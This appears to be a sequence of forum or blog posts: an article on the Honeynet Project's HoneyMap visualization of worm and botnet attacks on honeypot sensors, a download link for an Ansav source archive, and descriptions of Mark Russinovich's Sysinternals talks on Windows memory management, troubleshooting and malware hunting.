It looks like something you’d see in a 1980s film about a nuclear apocalypse. A screen in a control room in an underground bunker, where our mutually assured destruction was being mapped out. In fact it’s a real-time visualization of computers attacking other computers. The Honeynet Project, which runs the map, works by setting up “honeypot” sensors, computers that behave as potential targets for malware. The red markers on the map symbolize the attacks, mostly from botnets and worms. The yellow are the honeypots. The worms attempt to exploit the sensors by scanning them and looking for open ports. Just like the famed femmes fatales in the world of espionage, honeypots mimic vulnerabilities in order to learn how attackers operate and what tactics they use. In the text scroll on the map, you can see where the attacks are coming from -- mostly from Russia, the United States, Brazil, and Eastern Europe. The recipient of the attack is always one of the sensors, so for instance Aachen, Germany, comes up a lot as the project hosts a sensor at a university there. “The actual location of these sensors could be university server rooms or living rooms at home and they are mostly dedicated computers or virtual machines,” says Mark Schloesser, a research assistant at the RWTH Aachen University who is involved with the project. I asked Schloesser whether the map is representative of reality or is it skewed by where they have sensors: That depends on the worm code that actually attacks the sensors. Historically this kind of visualization would be skewed by the sensor location but with newer attack code (e.g. Conficker) [a computer worm] this is not true anymore, as the attack target selection is randomized. This means that a infected machine in Russia has the same chance of attacking Aachen as it has in attacking China. This means that the red dots roughly depict reality, but the amount of events is high at big sensors and low at small sensors. There have been other visualizations of network attacks. Check out this one from Akamai. And if you thought packets of data couldn’t be beautiful, have a look at this stylized visualization of cybercriminals hitting a VOIP (Voice over Internet protocol) server. WATCH: Visualizing a cyberattack on a VOIP server from Ben Reardon, Dataviz Australia on Vimeo. Just like disease tracking, the initiative could be helpful in helping fight malware, as Kyt Dotson points out at Silicon Angle: With data collection ventures like the Honeynet Project and a strong sifting through of the Big Data by security researchers and other outfits, we might see a revolution in how we track and prepare for the malware storms of the future. Mobile devices and PCs could make good use of anti-virus companies having access to knowledge of what’s trending so that they can prepare their flu-shots and vaccines early by prototyping and fingerprinting new malware. Japan's National Institute of Information and Communications Technology is doing this with its project Daedalus, which visualizes network attacks in real time. But for now the people behind HoneyMap are aware of its limited functionality. “To be honest, this specific visualization just looks nice and raises awareness about the still-existing worm infections and automated spreading code in use. In terms of actionable intelligence, you can't get a lot out of this,” Schloesser says. “In the future, as we add more sensor types and data sources, we hope that we can use the map as an easy monitoring solution and representation of Honeynet coverage. Also, for other botnet/worm families and other sensor types it actually might yield some insights. Right now it gives a purpose to our big screen at the office.” Source: http://www.rferl.org/content/watch-the-worlds-computers-attack-each-other-in-real-time/24719218.html

Download: http://www.ansav.com/get.php?f=ScAnsav_asm.zip http://www.ansav.com/

If you want to know the difference between System Committed memory and Process Committed memory,wondered what all those memory numbers shown by Task Manager really mean,or want to gain insight into the memory-related impact of a process,then this talk is for you. Using various memory analysis tools including: Process Explorer,VMMap,RAMMap,and others to highlight concepts throughout,the presentation starts with an overview of virtual memory management,describing types of process address space memory and how they impact system virtual memory. Then it dives into physical memory management,discussing how Windows manages process working sets,how it keeps track of physical memory,and how memory moves between different states. part 1: Mysteries of Memory Management Revealed (Part 1 of 2) part 2: Mysteries of Memory Management Revealed (Part 2 of 2) Speakers: Mark Russinovich Sursa: http://channel9.msdn.com/Events/Speakers/Mark+Russinovich

Speakers: Mark Russinovich Come hear Mark Russinovich, the master of Windows troubleshooting, walk you through step by step how he has solved seemingly unsolvable system and application problems on Windows. With all new real case studies, Mark shows how to apply the Microsoft Debugging Tools and his own Sysinternals tools, including Process Explorer, Process Monitor, to solve system crashes, process hangs, security vulnerabilities, DLL conflicts, permissions problems, registry misconfiguration, network hangs, and file system issues. These tools are used on a daily basis by Microsoft Product Support and have been used effectively to solve a wide variety of desktop and server issues, so being familiar with their operation and application will assist you in dealing with different problems on Windows. video: Case of the Unexplained 2012: Windows Troubleshooting with Mark Russinovich | TechEd North America 2012 | Channel 9 Slides (view online) sursa: http://channel9.msdn.com/Events/TechEd/NorthAmerica/2012/WCL301

Speakers: Mark Russinovich video: Malware Hunting with the Sysinternals Tools | TechEd Europe 2012 | Channel 9 Slides (view online) sursa: http://channel9.msdn.com/Events/Speakers/Mark+Russino